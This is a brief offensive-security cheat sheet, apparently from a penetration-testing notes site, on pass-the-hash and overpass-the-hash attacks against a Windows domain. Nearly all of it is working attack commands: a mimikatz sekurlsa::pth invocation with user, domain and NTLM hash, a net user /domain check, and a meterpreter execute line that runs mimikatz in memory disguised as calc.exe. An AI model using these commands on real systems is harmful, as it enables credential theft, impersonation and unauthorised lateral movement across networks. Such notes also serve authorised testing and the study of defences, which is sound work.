pass_the_hash
PASS THE HASH Over Pass The Hash
USE - mimikatz.exe
TYPE IN THE SHELL - sekurlsa::pth /user:improvement /domain:victim.local /ntlm:
CHECK YOUR CREDS - then in cmd window, check your shit net user /domain
From meterpreter
execute -H -i -c -m -d calc.exe -f /usr/share/mimikatz/x64/mimikatz.exe -a ' "sekurlsa::pth /user:improvement /domain:victim.local /ntlm:1234567890" exit'
Last updated
Was this helpful?